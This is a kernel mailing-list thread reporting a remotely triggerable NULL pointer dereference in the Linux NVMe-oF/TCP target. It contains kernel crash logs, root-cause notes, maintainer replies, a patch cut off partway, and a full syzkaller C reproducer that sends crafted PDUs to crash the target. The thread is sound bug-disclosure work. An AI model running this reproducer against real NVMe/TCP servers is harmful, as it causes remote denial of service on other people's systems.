linux-nvme.lists.infradead.org archive mirror
* [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
@ 2023-11-06 13:41 Alon Zahavi
  2023-11-06 21:35 ` Chaitanya Kulkarni
  2023-11-07 10:03 ` Chaitanya Kulkarni
  0 siblings, 2 replies; 6+ messages in thread
From: Alon Zahavi @ 2023-11-06 13:41 UTC (permalink / raw)
  To: linux-nvme; +Cc: Sagi Grimberg, Chaitanya Kulkarni, Christoph Hellwig

# Bug Overview

## The Bug
A null-ptr-deref in `__nvmet_req_complete`.

## Bug Location
`drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.

## Bug Class
Remote Denial of Service

## Disclaimer
This bug was found using Syzkaller with NVMe-oF/TCP support added.

# Technical Details

## Kernel Report - NULL Pointer Dereference

BUG: kernel NULL pointer dereference, address: 0000000000000020
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: 0000 [#1] PREEMPT SMP NOPTI
CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
Reference Platform, BIOS 6.00 11/12/2020
Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
PKRU: 55555554
Call Trace:
 <TASK>
 nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
 nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
 nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
 nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
 nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
 nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
 nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
 process_one_work+0x3da/0x870 kernel/workqueue.c:2597
 worker_thread+0x67/0x640 kernel/workqueue.c:2748
 kthread+0x164/0x1b0 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>

## Description

### Tracing The Bug
The bug occurs during the execution of `__nvmet_req_complete`. Looking
at the report generated by syzkaller, we can see the exact line of
code that triggers the bug.

Code Block 1:
```
static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
{
	struct nvmet_ns *ns = req->ns;

	if (!req->sq->sqhd_disabled) // 1
		nvmet_update_sq_head(req);

	...
}
```

In the first code block, we can see that `req->sq` is dereferenced
when checking the condition `if (!req->sq->sqhd_disabled)` (marked
`// 1`). However, when the reproducer is executed, `req->sq` is NULL,
and dereferencing it triggers a kernel panic.

## Root Cause
`req` is initialized during `nvmet_req_init`. However, the sequence
that leads into `__nvmet_req_complete` never calls `nvmet_req_init`,
so the kernel crashes with a NULL pointer dereference. The same flow
of execution could also end up dereferencing an uninitialized memory
address, which is undefined behaviour.

## Reproducer
I am attaching a reproducer generated by Syzkaller, with some
optimizations and minor changes.

```
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#include <linux/capability.h>

uint64_t r[1] = {0xffffffffffffffff};

void loop(void)
{
  intptr_t res = 0;
  res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
  if (res != -1)
    r[0] = res;
  *(uint16_t*)0x20000100 = 2;
  *(uint16_t*)0x20000102 = htobe16(0x1144);
  *(uint32_t*)0x20000104 = htobe32(0x7f000001);
  syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
  *(uint8_t*)0x200001c0 = 0;
  *(uint8_t*)0x200001c1 = 0;
  *(uint8_t*)0x200001c2 = 0x80;
  *(uint8_t*)0x200001c3 = 0;
  *(uint32_t*)0x200001c4 = 0x80;
  *(uint16_t*)0x200001c8 = 0;
  *(uint8_t*)0x200001ca = 0;
  *(uint8_t*)0x200001cb = 0;
  *(uint32_t*)0x200001cc = 0;
  memcpy((void*)0x200001d0,
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
         112);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
  *(uint8_t*)0x20000080 = 6;
  *(uint8_t*)0x20000081 = 3;
  *(uint8_t*)0x20000082 = 0x18;
  *(uint8_t*)0x20000083 = 0x1c;
  *(uint32_t*)0x20000084 = 2;
  *(uint16_t*)0x20000088 = 0x5d;
  *(uint16_t*)0x2000008a = 3;
  *(uint32_t*)0x2000008c = 0;
  *(uint32_t*)0x20000090 = 7;
  memcpy((void*)0x20000094, "\x83\x9e\x4f\x1a", 4);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}
int main(void)
{
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  loop();
  return 0;
}
```

### More information
When reproducing the bug, it sometimes manifests as an OOM
(out-of-memory) panic instead of a null-ptr-deref.
This suggests that another memory corruption may occur before the
NULL dereference. I could not find the root cause of the OOM bug, but
I am attaching its kernel log below.
```
kworker/u2:1 invoked oom-killer:
gfp_mask=0xcd0(GFP_KERNEL|__GFP_RECLAIMABLE), order=0, oom_score_adj=0
CPU: 0 PID: 22 Comm: kworker/u2:1 Not tainted 6.5.0-rc1+ #5
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
Reference Platform, BIOS 6.00 11/12/2020
Workqueue: eval_map_wq tracer_init_tracefs_work_func
Call Trace:
 <TASK>
 __dump_stack lib/dump_stack.c:88
 dump_stack_lvl+0xe1/0x110 lib/dump_stack.c:106
 dump_stack+0x19/0x20 lib/dump_stack.c:113
 dump_header+0x5c/0x7c0 mm/oom_kill.c:460
 out_of_memory+0x764/0xb10 mm/oom_kill.c:1161
 __alloc_pages_may_oom mm/page_alloc.c:3393
 __alloc_pages_slowpath mm/page_alloc.c:4153
 __alloc_pages+0xe87/0x1220 mm/page_alloc.c:4490
 alloc_pages+0xd7/0x200 mm/mempolicy.c:2279
 alloc_slab_page mm/slub.c:1862
 allocate_slab+0x37e/0x500 mm/slub.c:2017
 new_slab mm/slub.c:2062
 ___slab_alloc+0x9c6/0x1250 mm/slub.c:3215
 __slab_alloc mm/slub.c:3314
 __slab_alloc_node mm/slub.c:3367
 slab_alloc_node mm/slub.c:3460
 slab_alloc mm/slub.c:3478
 __kmem_cache_alloc_lru mm/slub.c:3485
 kmem_cache_alloc_lru+0x45e/0x5d0 mm/slub.c:3501
 __d_alloc+0x3d/0x2f0 fs/dcache.c:1769
 d_alloc fs/dcache.c:1849
 d_alloc_parallel+0x75/0x1040 fs/dcache.c:2638
 __lookup_slow+0xf4/0x2a0 fs/namei.c:1675
 lookup_one_len+0xde/0x100 fs/namei.c:2742
 start_creating+0xaf/0x180 fs/tracefs/inode.c:426
 tracefs_create_file+0xa2/0x260 fs/tracefs/inode.c:493
 trace_create_file+0x38/0x70 kernel/trace/trace.c:9014
 event_create_dir+0x4c0/0x6e0 kernel/trace/trace_events.c:2470
 __trace_early_add_event_dirs+0x57/0x100 kernel/trace/trace_events.c:3570
 early_event_add_tracer kernel/trace/trace_events.c:3731
 event_trace_init+0xe4/0x160 kernel/trace/trace_events.c:3888
 tracer_init_tracefs_work_func+0x15/0x440 kernel/trace/trace.c:9904
 process_one_work+0x3da/0x870 kernel/workqueue.c:2597
 worker_thread+0x67/0x640 kernel/workqueue.c:2748
 kthread+0x164/0x1b0 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>
Mem-Info:
active_anon:0 inactive_anon:0 isolated_anon:0
 active_file:0 inactive_file:0 isolated_file:0
 unevictable:0 dirty:0 writeback:0
 slab_reclaimable:2207 slab_unreclaimable:3054
 mapped:0 shmem:0 pagetables:3
 sec_pagetables:0 bounce:0
 kernel_misc_reclaimable:0
 free:691 free_pcp:2 free_cma:0
Node 0 active_anon:0kB inactive_anon:0kB active_file:0kB
inactive_file:0kB unevictable:0kB isolated(anon):0kB
isolated(file):0kB mapped:0kB dirty:0kB writeback:0kB shmem:0kB
shmem_thp: 0kB shmem_pmdmapped: 0kB anon_thp: 0kB writeback_tmp:0kB
kernel_stack:624kB pagetables:12kB sec_pagetables:0kB
all_unreclaimable? no
Node 0 DMA free:0kB boost:0kB min:0kB low:0kB high:0kB
reserved_highatomic:0KB active_anon:0kB inactive_anon:0kB
active_file:0kB inactive_file:0kB unevictable:0kB writepending:0kB
present:600kB managed:0kB mlocked:0kB bounce:0kB free_pcp:0kB
local_pcp:0kB free_cma:0kB
lowmem_reserve[]: 0 0 0 0 0
Node 0 DMA32 free:2764kB boost:2048kB min:2764kB low:2940kB
high:3116kB reserved_highatomic:0KB active_anon:0kB inactive_anon:0kB
active_file:0kB inactive_file:0kB unevictable:0kB writepending:0kB
present:195988kB managed:32344kB mlocked:0kB bounce:0kB free_pcp:8kB
local_pcp:8kB free_cma:0kB
lowmem_reserve[]: 0 0 0 0 0
Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB
0*1024kB 0*2048kB 0*4096kB = 0kB
Node 0 DMA32: 3*4kB (ME) 0*8kB 4*16kB (UM) 2*32kB (UM) 1*64kB (U)
2*128kB (UM) 1*256kB (M) 2*512kB (UE) 1*1024kB (U) 0*2048kB 0*4096kB =
2764kB
Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0
hugepages_size=1048576kB
Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
0 total pagecache pages
0 pages in swap cache
Free swap  = 0kB
Total swap = 0kB
49147 pages RAM
0 pages HighMem/MovableOnly
41061 pages reserved
0 pages hwpoisoned
Unreclaimable slab info:
Name                      Used          Total
bio_crypt_ctx              7KB          7KB
bio-200                    4KB          4KB
biovec-max                32KB         32KB
biovec-128                16KB         16KB
biovec-64                  8KB          8KB
dmaengine-unmap-256         30KB         30KB
dmaengine-unmap-128         15KB         15KB
skbuff_ext_cache           3KB          3KB
skbuff_small_head          7KB          7KB
skbuff_head_cache          4KB          4KB
proc_dir_entry            44KB         44KB
shmem_inode_cache         15KB         15KB
kernfs_node_cache       4559KB       4559KB
mnt_cache                  7KB          7KB
names_cache               32KB         32KB
lsm_inode_cache          139KB        139KB
nsproxy                    3KB          3KB
files_cache               15KB         15KB
signal_cache              62KB         62KB
sighand_cache             91KB         91KB
task_struct              353KB        353KB
cred_jar                   7KB          7KB
pid                       12KB         12KB
Acpi-ParseExt              3KB          3KB
Acpi-State                 3KB          3KB
shared_policy_node        390KB        390KB
numa_policy                3KB          3KB
perf_event                30KB         30KB
trace_event_file         142KB        142KB
ftrace_event_field        231KB        231KB
pool_workqueue            12KB         12KB
maple_node                 4KB          4KB
mm_struct                 30KB         30KB
vmap_area                696KB        696KB
page->ptl                  4KB          4KB
kmalloc-cg-4k             32KB         32KB
kmalloc-cg-2k             16KB         16KB
kmalloc-cg-1k              8KB          8KB
kmalloc-cg-512             8KB          8KB
kmalloc-cg-256             4KB          4KB
kmalloc-cg-192             3KB          3KB
kmalloc-cg-128             4KB          4KB
kmalloc-cg-96              3KB          3KB
kmalloc-cg-32              4KB          4KB
kmalloc-cg-16              4KB          4KB
kmalloc-cg-8               4KB          4KB
kmalloc-8k                64KB         64KB
kmalloc-4k               288KB        288KB
kmalloc-2k              2656KB       2656KB
kmalloc-1k               184KB        184KB
kmalloc-512              736KB        736KB
kmalloc-256               44KB         44KB
kmalloc-192               55KB         55KB
kmalloc-128               28KB         28KB
kmalloc-96                43KB         43KB
kmalloc-64                84KB         84KB
kmalloc-32                72KB         72KB
kmalloc-16                68KB         68KB
kmalloc-8                 20KB         20KB
kmem_cache_node           16KB         16KB
kmem_cache                32KB         32KB
Tasks state (memory values in pages):
[  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents
oom_score_adj name
Out of memory and no killable processes...
Kernel panic - not syncing: System is deadlocked on memory
CPU: 0 PID: 22 Comm: kworker/u2:1 Not tainted 6.5.0-rc1+ #5
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
Reference Platform, BIOS 6.00 11/12/2020
Workqueue: eval_map_wq tracer_init_tracefs_work_func
Call Trace:
 <TASK>
 __dump_stack lib/dump_stack.c:88
 dump_stack_lvl+0xaa/0x110 lib/dump_stack.c:106
 dump_stack+0x19/0x20 lib/dump_stack.c:113
 panic+0x567/0x5b0 kernel/panic.c:340
 out_of_memory+0xb0d/0xb10 mm/oom_kill.c:1169
 __alloc_pages_may_oom mm/page_alloc.c:3393
 __alloc_pages_slowpath mm/page_alloc.c:4153
 __alloc_pages+0xe87/0x1220 mm/page_alloc.c:4490
 alloc_pages+0xd7/0x200 mm/mempolicy.c:2279
 alloc_slab_page mm/slub.c:1862
 allocate_slab+0x37e/0x500 mm/slub.c:2017
 new_slab mm/slub.c:2062
 ___slab_alloc+0x9c6/0x1250 mm/slub.c:3215
 __slab_alloc mm/slub.c:3314
 __slab_alloc_node mm/slub.c:3367
 slab_alloc_node mm/slub.c:3460
 slab_alloc mm/slub.c:3478
 __kmem_cache_alloc_lru mm/slub.c:3485
 kmem_cache_alloc_lru+0x45e/0x5d0 mm/slub.c:3501
 __d_alloc+0x3d/0x2f0 fs/dcache.c:1769
 d_alloc fs/dcache.c:1849
 d_alloc_parallel+0x75/0x1040 fs/dcache.c:2638
 __lookup_slow+0xf4/0x2a0 fs/namei.c:1675
 lookup_one_len+0xde/0x100 fs/namei.c:2742
 start_creating+0xaf/0x180 fs/tracefs/inode.c:426
 tracefs_create_file+0xa2/0x260 fs/tracefs/inode.c:493
 trace_create_file+0x38/0x70 kernel/trace/trace.c:9014
 event_create_dir+0x4c0/0x6e0 kernel/trace/trace_events.c:2470
 __trace_early_add_event_dirs+0x57/0x100 kernel/trace/trace_events.c:3570
 early_event_add_tracer kernel/trace/trace_events.c:3731
 event_trace_init+0xe4/0x160 kernel/trace/trace_events.c:3888
 tracer_init_tracefs_work_func+0x15/0x440 kernel/trace/trace.c:9904
 process_one_work+0x3da/0x870 kernel/workqueue.c:2597
 worker_thread+0x67/0x640 kernel/workqueue.c:2748
 kthread+0x164/0x1b0 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>
---[ end Kernel panic - not syncing: System is deadlocked on memory ]---
```
If you figure out what caused the OOM, please let me know.



* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
  2023-11-06 13:41 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete` Alon Zahavi
@ 2023-11-06 21:35 ` Chaitanya Kulkarni
  2023-11-07 10:03 ` Chaitanya Kulkarni
  1 sibling, 0 replies; 6+ messages in thread
From: Chaitanya Kulkarni @ 2023-11-06 21:35 UTC (permalink / raw)
  To: Alon Zahavi, linux-nvme; +Cc: Sagi Grimberg, Christoph Hellwig


On 11/6/2023 5:41 AM, Alon Zahavi wrote:
> # Bug Overview
> 
> ## The Bug
> A null-ptr-deref in `__nvmet_req_complete`.
> 
> ## Bug Location
> `drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.
> 
> ## Bug Class
> Remote Denial of Service
> 
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.
> 
> # Technical Details
> 
> ## Kernel Report - NULL Pointer Dereference
> 
> BUG: kernel NULL pointer dereference, address: 0000000000000020
> #PF: supervisor read access in kernel mode
> #PF: error_code(0x0000) - not-present page
> PGD 0 P4D 0
> Oops: 0000 [#1] PREEMPT SMP NOPTI
> CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
> Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
> Reference Platform, BIOS 6.00 11/12/2020
> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
> Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
> d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
> b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
> RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
> RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
> RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
> RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
> R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
> FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
> PKRU: 55555554
> Call Trace:
>   <TASK>
>   nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
>   nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
>   nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
>   nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
>   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
>   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
>   nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
>   process_one_work+0x3da/0x870 kernel/workqueue.c:2597
>   worker_thread+0x67/0x640 kernel/workqueue.c:2748
>   kthread+0x164/0x1b0 kernel/kthread.c:389
>   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>   </TASK>
> 
> 

Thanks for reporting this, will send a fix soon, working on it with
priority.

-ck




* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
  2023-11-06 13:41 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete` Alon Zahavi
  2023-11-06 21:35 ` Chaitanya Kulkarni
@ 2023-11-07 10:03 ` Chaitanya Kulkarni
  2023-11-09 13:17   ` Alon Zahavi
  2023-11-20 10:56   ` Sagi Grimberg
  1 sibling, 2 replies; 6+ messages in thread
From: Chaitanya Kulkarni @ 2023-11-07 10:03 UTC (permalink / raw)
  To: Alon Zahavi, linux-nvme; +Cc: Sagi Grimberg, Christoph Hellwig

On 11/6/23 05:41, Alon Zahavi wrote:
> # Bug Overview
>
> ## The Bug
> A null-ptr-deref in `__nvmet_req_complete`.
>
> ## Bug Location
> `drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.
>
> ## Bug Class
> Remote Denial of Service
>
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.
>
> # Technical Details
>
> ## Kernel Report - NULL Pointer Dereference
>
> BUG: kernel NULL pointer dereference, address: 0000000000000020
> #PF: supervisor read access in kernel mode
> #PF: error_code(0x0000) - not-present page
> PGD 0 P4D 0
> Oops: 0000 [#1] PREEMPT SMP NOPTI
> CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
> Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
> Reference Platform, BIOS 6.00 11/12/2020
> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
> Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
> d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
> b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
> RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
> RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
> RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
> RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
> R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
> FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
> PKRU: 55555554
> Call Trace:
>   <TASK>
>   nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
>   nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
>   nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
>   nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
>   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
>   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
>   nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
>   process_one_work+0x3da/0x870 kernel/workqueue.c:2597
>   worker_thread+0x67/0x640 kernel/workqueue.c:2748
>   kthread+0x164/0x1b0 kernel/kthread.c:389
>   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>   </TASK>
>
> ## Description
>
> ### Tracing The Bug
> The bug occurs during the execution of __nvmet_req_complete. Looking
> in the report generated by syzkaller, we can see the exact line of
> code that triggers the bug.
>
> Code Block 1:
> ```
> static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
> {
> struct nvmet_ns *ns = req->ns;
>
> if (!req->sq->sqhd_disabled) // 1
> nvmet_update_sq_head(req);
>
>    ..
> }
> ```
>
> In the first code block, we can see that there is a dereference of
> `req->sq` when checking the condition `if (!req->sq->sqhd_disabled)`.
> However, when executing the reproducer, `req->sq` is NULL. When trying
> to dereference it, the kernel triggers a panic.
>
> ## Root Cause
> `req` is initialized during `nvmet_req_init`. However, the sequence
> that leads into `__nvmet_req_complete` does not contain any call for
> `nvmet_req_init`, thus crashing the kernel with NULL pointer
> dereference. This flow of execution can also create a situation where
> an uninitialized memory address will be dereferenced, which has
> undefined behaviour.
>
> ## Reproducer
> I am adding a reproducer generated by Syzkaller with some
> optimizations and minor changes.
>
> ```
> // autogenerated by syzkaller (<https://github.com/google/syzkaller>)
>
> #define _GNU_SOURCE
>
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <sched.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/mount.h>
> #include <sys/prctl.h>
> #include <sys/resource.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/time.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <unistd.h>
>
> #include <linux/capability.h>
>
> uint64_t r[1] = {0xffffffffffffffff};
>
> void loop(void)
> {
>    intptr_t res = 0;
>    res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
>    if (res != -1)
>      r[0] = res;
>    *(uint16_t*)0x20000100 = 2;
>    *(uint16_t*)0x20000102 = htobe16(0x1144);
>    *(uint32_t*)0x20000104 = htobe32(0x7f000001);
>    syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
>    *(uint8_t*)0x200001c0 = 0;
>    *(uint8_t*)0x200001c1 = 0;
>    *(uint8_t*)0x200001c2 = 0x80;
>    *(uint8_t*)0x200001c3 = 0;
>    *(uint32_t*)0x200001c4 = 0x80;
>    *(uint16_t*)0x200001c8 = 0;
>    *(uint8_t*)0x200001ca = 0;
>    *(uint8_t*)0x200001cb = 0;
>    *(uint32_t*)0x200001cc = 0;
>    memcpy((void*)0x200001d0,
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
>           112);
>    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
>            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
>    *(uint8_t*)0x20000080 = 6;
>    *(uint8_t*)0x20000081 = 3;
>    *(uint8_t*)0x20000082 = 0x18;
>    *(uint8_t*)0x20000083 = 0x1c;
>    *(uint32_t*)0x20000084 = 2;
>    *(uint16_t*)0x20000088 = 0x5d;
>    *(uint16_t*)0x2000008a = 3;
>    *(uint32_t*)0x2000008c = 0;
>    *(uint32_t*)0x20000090 = 7;
>    memcpy((void*)0x20000094, "\x83\x9e\x4f\x1a", 4);
>    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
>            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> }
> int main(void)
> {
>    syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    loop();
>    return 0;
> }
> ```
>
>


I'm not able to reproduce the problem [1]; all I get is the following
error once I set up a target with NVMe-oF/TCP and run the above program :-

[22180.507777] nvmet_tcp: failed to allocate queue, error -107

Can you try the following patch? Full disclosure: I've only
compile-tested it, and wrote it based on code inspection alone :-

diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
index 92b74d0b8686..e35e8d79c66a 100644
--- a/drivers/nvme/target/tcp.c
+++ b/drivers/nvme/target/tcp.c
@@ -992,12 +992,26 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct nvmet_tcp_queue *queue)
 	}
 
 	if (le32_to_cpu(data->data_offset) != cmd->rbytes_done) {
